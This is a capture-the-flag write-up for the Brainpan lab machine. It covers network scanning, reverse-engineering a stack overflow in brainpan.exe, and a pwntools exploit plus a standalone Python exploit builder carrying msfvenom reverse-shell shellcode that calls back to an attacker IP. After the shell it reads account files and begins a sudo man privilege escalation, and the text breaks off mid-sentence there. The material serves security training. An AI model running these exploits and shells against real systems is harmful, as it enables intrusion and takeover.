Brainpan

Host discovery

nmap -sn 192.168.65.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-23 16:02 China Standard Time
Nmap scan report for 192.168.65.1
Host is up (0.0020s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.65.2
Host is up (0.0011s latency).
MAC Address: 00:50:56:EB:B8:29 (VMware)
Nmap scan report for 192.168.65.137
Host is up (0.00s latency).
MAC Address: 00:0C:29:83:FD:67 (VMware)
Nmap scan report for 192.168.65.254
Host is up (0.0011s latency).
MAC Address: 00:50:56:FD:72:65 (VMware)
Nmap scan report for 192.168.65.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.15 seconds

Port scan

nmap --min-rate 10000 -p- 192.168.65.137 -oA nmapscan/ports
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-23 16:03 China Standard Time
Nmap scan report for 192.168.65.137
Host is up (0.0019s latency).
Not shown: 65533 closed tcp ports (reset)
PORT      STATE SERVICE
9999/tcp  open  abyss
10000/tcp open  snet-sensor-mgmt
MAC Address: 00:0C:29:83:FD:67 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 31.01 seconds

TCP

nmap -sT -sV -sC -O -p 9999,10000 192.168.65.137 -oA nmapscan/detail
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-23 16:04 China Standard Time
Nmap scan report for 192.168.65.137
Host is up (0.00096s latency).

PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
| fingerprint-strings:
|   NULL:
|     _| _|
|     _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
|     _|_| _| _| _| _| _| _| _| _| _| _| _|
|     _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
|     [________________________ WELCOME TO BRAINPAN _________________________]
|_    ENTER THE PASSWORD
10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.94%I=7%D=1/23%Time=65AF7330%P=i686-pc-windows-windows%
SF:r(NULL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\
SF:|_\|\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\
SF:x20\x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_
SF:\|\x20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_
SF:\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_
SF:\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x2
SF:0_\|\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x
SF:20\x20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\
SF:x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x
SF:20\x20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINP
SF:AN\x20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENT
SF:ER\x20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:n\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");
MAC Address: 00:0C:29:83:FD:67 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.21 seconds

UDP

nmap -sU -p 9999,10000 192.168.65.137 -oA nmapscan/udp
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-23 16:08 China Standard Time
Nmap scan report for 192.168.65.137
Host is up (0.00089s latency).

PORT      STATE  SERVICE
9999/udp  closed distinct
10000/udp closed ndmp
MAC Address: 00:0C:29:83:FD:67 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds

Nmap vulnerability scan

nmap --script=vuln -p 9999,10000 192.168.65.137 -oA nmapscan/vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-26 11:30 China Standard Time
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.65.137
Host is up (0.0010s latency).

PORT      STATE SERVICE
9999/tcp  open  abyss
10000/tcp open  snet-sensor-mgmt
MAC Address: 00:0C:29:83:FD:67 (VMware)

Attack plan

Port 9999

Connect to the service with nc and see what it does:

nc 192.168.65.137 9999
_|                            _|
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD

                          >> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
                          ACCESS DENIED

It prompts for a password; a wrong one gets ACCESS DENIED and the connection is closed.

Web

Browsing the HTTP service

A single image, no other links.

Directory brute-force

Nothing so far; run a directory scan:

gobuster dir -u http://192.168.65.137:10000 --wordlist=D:\Global\apps\SecLists\current\Discovery\Web-Content\raft-large-directories.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.65.137:10000
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                D:\Global\apps\SecLists\current\Discovery\Web-Content\raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2024/01/26 11:37:48 Starting gobuster in directory enumeration mode
===============================================================
/bin                  (Status: 301) [Size: 0] [--> /bin/]
Progress: 23082 / 62285 (37.06%)[ERROR] 2024/01/26 11:37:58 [!] parse "http://192.168.65.137:10000/error\x1f_log": net/url: invalid control character in URL
Progress: 62284 / 62285 (100.00%)
===============================================================
2024/01/26 11:38:15 Finished
===============================================================

One extra path, /bin/. Browsing it turns up a file named brainpan.exe.

Download it and inspect it:

file ./brainpan.exe 
brainpan.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows

A 32-bit Windows console executable; run it to see what it does:

./brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.

It creates a listening socket bound to port 9999, which matches the port scan. Note that the target fingerprints as Linux yet serves a Windows PE, so the binary is presumably being run under Wine on the box; that is why a Linux payload will work against it later.

Pwn

Open it in IDA.

The main function decompiles to:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  void *v3; // esp
  int v4; // eax
  int v5; // eax
  int v6; // eax
  int v7; // eax
  int v8; // eax
  int v9; // eax
  int v10; // eax
  struct sockaddr addr; // [esp+30h] [ebp-5D8h] BYREF
  struct sockaddr name; // [esp+40h] [ebp-5C8h] BYREF
  SOCKET v14; // [esp+58h] [ebp-5B0h]
  SOCKET s; // [esp+5Ch] [ebp-5ACh]
  struct WSAData WSAData; // [esp+60h] [ebp-5A8h] BYREF
  int v17; // [esp+1F8h] [ebp-410h]
  int v18; // [esp+1FCh] [ebp-40Ch]
  int addrlen; // [esp+200h] [ebp-408h] BYREF
  char *v20; // [esp+204h] [ebp-404h]
  char *v21; // [esp+208h] [ebp-400h]
  char *Str; // [esp+20Ch] [ebp-3FCh]
  char buf[1016]; // [esp+210h] [ebp-3F8h] BYREF

  v3 = alloca(16);
  __main();
  Str = "_|                            _|                                        \n"
        "_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  \n"
        "_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|\n"
        "_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|\n"
        "_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|\n"
        "                                            _|                          \n"
        "                                            _|\n"
        "\n"
        "[________________________ WELCOME TO BRAINPAN _________________________]\n"
        "                          ENTER THE PASSWORD                              \n"
        "\n"
        "                          >> ";
  v21 = "                          ACCESS DENIED\n";
  v20 = "                          ACCESS GRANTED\n";
  v18 = 9999;
  v17 = 1;
  printf("[+] initializing winsock...");
  if ( WSAStartup(0x202u, &WSAData) )
  {
    v4 = WSAGetLastError();
    printf("[!] winsock init failed: %d", v4);
  }
  else
  {
    printf("done.\n");
    s = socket(2, 1, 0);
    if ( s == -1 )
    {
      v5 = WSAGetLastError();
      printf("[!] could not create socket: %d", v5);
    }
    printf("[+] server socket created.\n");
    name.sa_family = 2;
    *(_DWORD *)&name.sa_data[2] = 0;
    *(_WORD *)name.sa_data = htons(0x270Fu);
    if ( bind(s, &name, 16) == -1 )
    {
      v6 = WSAGetLastError();
      printf("[!] bind failed: %d", v6);
    }
    printf("[+] bind done on port %d\n", v18);
    listen(s, 3);
    printf("[+] waiting for connections.\n");
    addrlen = 16;
    while ( 1 )
    {
      v14 = accept(s, &addr, &addrlen);
      if ( v14 == -1 )
        break;
      printf("[+] received connection.\n");
      memset(buf, 0, 0x3E8u);
      v7 = strlen(Str);
      send(v14, Str, v7, 0);
      recv(v14, buf, 1000, 0);
      v17 = get_reply(buf);
      printf("[+] check is %d\n", v17);
      if ( get_reply(buf) )
      {
        v9 = strlen(v20);
        send(v14, v21, v9, 0);
      }
      else
      {
        v8 = strlen(v21);
        send(v14, v20, v8, 0);
      }
      closesocket(v14);
    }
    v10 = WSAGetLastError();
    printf("[!] accept failed: %d", v10);
  }
  return 1;
}

There is also a winkwink function that is never called but contains a useful gadget:

void winkwink()
{
  __asm { jmp     esp }
}

The interesting part is get_reply:

int __cdecl get_reply(char *Source)
{
  size_t v1; // eax
  char Destination[520]; // [esp+10h] [ebp-208h] BYREF

  printf("[get_reply] s = [%s]\n", Source);
  strcpy(Destination, Source);
  v1 = strlen(Destination);
  printf("[get_reply] copied %d bytes to buffer\n", v1);
  return strcmp(Destination, "shitstorm\n");
}

Flow analysis

  • get_reply copies its argument Source into the local buffer Destination with strcpy, which performs no length check and stops only at the first NUL byte
  • Source is the caller's buffer buf in main
  • main fills buf with up to 1000 bytes straight from recv
  • Destination is only 520 bytes (it sits at ebp-0x208, directly below the saved EBP and the return address)
  • 1000 bytes into a 520-byte stack buffer: a stack overflow that reaches the saved return address

First generate the padding with pwntools' cyclic:

kali@kali ~/Desktop> cyclic 1000
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaaj

Debug the program locally in IDA and send the pattern to it with nc:

nc localhost 9999
_|                            _|
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD

                          >> aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaaj

IDA stops on an access violation; at that point EIP holds 0x66616167:

66616167: The instruction at 0x66616167 referenced memory at 0x66616167. The memory could not be executed -> 66616167 (exc.code c0000005, tid 12316)
kali@kali ~/Desktop> cyclic -l 0x66616167
524

cyclic -l (also from pwntools) maps that value back to offset 524: EIP is loaded little-endian, so 0x66616167 is the substring "gaaf" of the pattern, which begins at byte 524. That agrees with the frame layout from the decompiler: Destination occupies 520 bytes at ebp-0x208, followed by the 4-byte saved EBP, so bytes 524-527 of the input land on the saved return address.

Exploit script

Generate the shellcode with msfvenom. -b "\x00" excludes NUL bytes because strcpy stops copying at the first one; the payload is linux/x86 because the service, although a Windows PE, is running on a Linux host.

msfvenom -p linux/x86/shell_reverse_tcp -b "\x00" LHOST=192.168.65.134 LPORT=4444 -f python
D:/Global/apps/metasploit-framework/6.3.35-20230919103440/embedded/lib/ruby/gems/3.0.0/gems/rex-core-0.1.31/lib/rex/compat.rb:381: warning: Win32API is deprecated after Ruby 1.9.1; use fiddle directly instead
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of python file: 479 bytes
buf =  b""
buf += b"\xb8\x5a\xa7\x13\x8b\xda\xc8\xd9\x74\x24\xf4\x5b"
buf += b"\x33\xc9\xb1\x12\x83\xc3\x04\x31\x43\x0e\x03\x19"
buf += b"\xa9\xf1\x7e\xac\x6e\x02\x63\x9d\xd3\xbe\x0e\x23"
buf += b"\x5d\xa1\x7f\x45\x90\xa2\x13\xd0\x9a\x9c\xde\x62"
buf += b"\x93\x9b\x19\x0a\xe4\xf4\x9b\x4c\x8c\x06\x1c\x41"
buf += b"\x11\x8e\xfd\xd1\xcf\xc0\xac\x42\xa3\xe2\xc7\x85"
buf += b"\x0e\x64\x85\x2d\xff\x4a\x59\xc5\x97\xbb\xb2\x77"
buf += b"\x01\x4d\x2f\x25\x82\xc4\x51\x79\x2f\x1a\x11"

Use the jmp esp in winkwink to redirect execution: after the ret, ESP points just past the overwritten return address, so whatever follows it in the input runs as code. The instruction is at 0x311712F3, which contains no NUL byte and therefore survives the strcpy.

from pwn import *
context(os='linux', arch='i386', log_level='debug')
io = remote('192.168.65.137', 9999)
padding = 524            # offset to the saved return address (cyclic -l 0x66616167)
jmp_esp = 0x311712F3     # jmp esp inside winkwink(); no NUL bytes
# msfvenom -p linux/x86/shell_reverse_tcp -b "\x00" LHOST=192.168.65.134 LPORT=4444
buf = b"\xb8\x5a\xa7\x13\x8b\xda\xc8\xd9\x74\x24\xf4\x5b"
buf += b"\x33\xc9\xb1\x12\x83\xc3\x04\x31\x43\x0e\x03\x19"
buf += b"\xa9\xf1\x7e\xac\x6e\x02\x63\x9d\xd3\xbe\x0e\x23"
buf += b"\x5d\xa1\x7f\x45\x90\xa2\x13\xd0\x9a\x9c\xde\x62"
buf += b"\x93\x9b\x19\x0a\xe4\xf4\x9b\x4c\x8c\x06\x1c\x41"
buf += b"\x11\x8e\xfd\xd1\xcf\xc0\xac\x42\xa3\xe2\xc7\x85"
buf += b"\x0e\x64\x85\x2d\xff\x4a\x59\xc5\x97\xbb\xb2\x77"
buf += b"\x01\x4d\x2f\x25\x82\xc4\x51\x79\x2f\x1a\x11"
nop = b"\x90"
payload = flat(['a'*padding, jmp_esp])   # flat() packs jmp_esp little-endian for i386
payload += nop * 16  # NOP sled: the shikata_ga_nai decoder stub writes to the stack around ESP while it runs, so keep the encoded bytes clear of it
payload += buf
io.recvuntil(b">>")   # wait for the password prompt before sending
io.sendline(payload)
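As an added example (not code from the original writeup), the following rebuilds the three steps above without pwntools so each can be checked on its own: it regenerates the same de Bruijn pattern that cyclic produces, maps the crashed EIP value back to the 524-byte offset, and assembles the payload while enforcing the two constraints the binary imposes on input (no NUL bytes, because strcpy stops at the first one, and at most 1000 bytes, because that is what recv reads). The offset and jmp esp address are the writeup's; the target host and port and the int3 placeholder shellcode in the main block are assumptions, and the sample EIP value is the one observed above.

```python
"""Added example: the Brainpan overflow pieces without pwntools.
Not code from the original writeup; host, port and shellcode in main() are placeholders."""
import socket
import string
import struct

ALPHABET = string.ascii_lowercase   # the alphabet pwntools' cyclic uses
OFFSET = 524                        # bytes before the saved return address
JMP_ESP = 0x311712F3                # jmp esp in winkwink(), from the writeup
BADCHARS = b"\x00"                  # strcpy() stops at the first NUL
MAX_LEN = 1000                      # recv(v14, buf, 1000, 0) in main()


def de_bruijn(alphabet=ALPHABET, n=4):
    """Generate B(k, n) with the FKM algorithm. This is the same construction
    pwntools uses, so offsets agree with `cyclic -l`."""
    k = len(alphabet)
    a = [0] * k * n

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length):
    """First `length` bytes of the pattern (like `cyclic 1000`)."""
    out = []
    for ch in de_bruijn():
        if len(out) >= length:
            break
        out.append(ch)
    return "".join(out).encode()


def cyclic_find(value, length=MAX_LEN):
    """Offset of the pattern bytes that landed in EIP. The register holds the
    4 bytes little-endian, so 0x66616167 is b"gaaf" in the pattern."""
    return cyclic(length).find(struct.pack("<I", value))


def build_payload(shellcode, offset=OFFSET, ret=JMP_ESP, nops=16):
    """padding | jmp esp | NOP sled | shellcode, validated against the
    constraints get_reply()/main() impose on the input."""
    payload = b"A" * offset + struct.pack("<I", ret) + b"\x90" * nops + shellcode
    for b in BADCHARS:
        if b in payload:
            raise ValueError("payload contains bad byte 0x%02x" % b)
    if len(payload) > MAX_LEN:
        raise ValueError("payload is %d bytes, recv() only reads %d" % (len(payload), MAX_LEN))
    return payload


def send_payload(host, port, payload, timeout=5):
    """Wait for the '>> ' prompt, then deliver the payload in one send()."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = b""
        while not banner.endswith(b">> "):
            chunk = s.recv(4096)
            if not chunk:
                raise ConnectionError("server closed before the prompt")
            banner += chunk
        s.sendall(payload)


if __name__ == "__main__":
    print(cyclic_find(0x66616167))            # offset seen in the debugger: 524
    sc = b"\xcc" * 8                          # placeholder (int3); substitute real shellcode
    pl = build_payload(sc)
    send_payload("192.168.65.137", 9999, pl)  # assumed target address from the writeup
```

The bad-byte check is the one that matters here: the msfvenom output above was already produced with -b "\x00", but the return address and any padding you change by hand also pass through strcpy, so validate the whole buffer rather than only the shellcode.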

Reverse shell

Start an nc listener, run the exploit script and wait for the callback:

user@ubuntu ~/Desktop [SIGINT]> nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.65.137 39127
python -c "import pty;pty.spawn('/bin/bash')"
puck@brainpan:/home/puck$ whoami
whoami
puck
puck@brainpan:/home/puck$

Host enumeration

puck@brainpan:/home/puck$ uname -a
uname -a
Linux brainpan 3.5.0-25-generic #39-Ubuntu SMP Mon Feb 25 19:02:34 UTC 2013 i686 i686 i686 GNU/Linux
puck@brainpan:/home/puck$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/home/puck$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash
puck@brainpan:/home/puck$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
puck@brainpan:/home/puck$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
puck@brainpan:/home/puck$ cat /proc/version
cat /proc/version
Linux version 3.5.0-25-generic (buildd@lamiak) (gcc version 4.7.2 (Ubuntu/Linaro 4.7.2-2ubuntu1) ) #39-Ubuntu SMP Mon Feb 25 19:02:34 UTC 2013
puck@brainpan:/home/puck$

Privilege escalation

python -c "import pty;pty.spawn('/bin/bash')"
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util
sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
  - network
  - proclist
  - manual [command]

The manual action takes a command name; try it with date:

puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual date
sudo /home/anansi/bin/anansi_util manual date
No manual entry for manual
WARNING: terminal is not fully functional
-  (press RETURN)
DATE(1)                          User Commands                         DATE(1)

NAME
       date - print or set the system date and time

SYNOPSIS
       date [OPTION]... [+FORMAT]
       date [-u|--utc|--universal] [MMDDhhmm[[CC]YY][.ss]]

DESCRIPTION
       Display the current time in the given FORMAT, or set the system date.

       -d, --date=STRING
              display time described by STRING, not `now'

       -f, --file=DATEFILE
              like --date once for each line of DATEFILE

       -r, --reference=FILE
              display the last modification time of FILE

       -R, --rfc-2822
              output  date  and time in RFC 2822 format.  Example: Mon, 07 Aug
 Manual page date(1) line 1 (press h for help or q to quit)q
puck@brainpan:/home/puck$ 
puck@brainpan:/home/puck$ man date
man date
WARNING: terminal is not fully functional
-  (press RETURN)
DATE(1)                          User Commands                         DATE(1)

NAME
       date - print or set the system date and time

SYNOPSIS
       date [OPTION]... [+FORMAT]
       date [-u|--utc|--universal] [MMDDhhmm[[CC]YY][.ss]]

DESCRIPTION
       Display the current time in the given FORMAT, or set the system date.

       -d, --date=STRING
              display time described by STRING, not `now'

       -f, --file=DATEFILE
              like --date once for each line of DATEFILE

       -r, --reference=FILE
              display the last modification time of FILE

       -R, --rfc-2822
              output  date  and time in RFC 2822 format.  Example: Mon, 07 Aug
 Manual page date(1) line 1 (press h for help or q to quit)q

The output is identical to man date: the wrapper simply invokes man on its argument, and since it runs under sudo, man runs as root.

GTFOBins lists man as a sudo shell escape: its pager (less, judging by the prompt above) executes !command from the prompt as the same user, which here is root. Apply the same trick through the wrapper, asking it for man's own page:
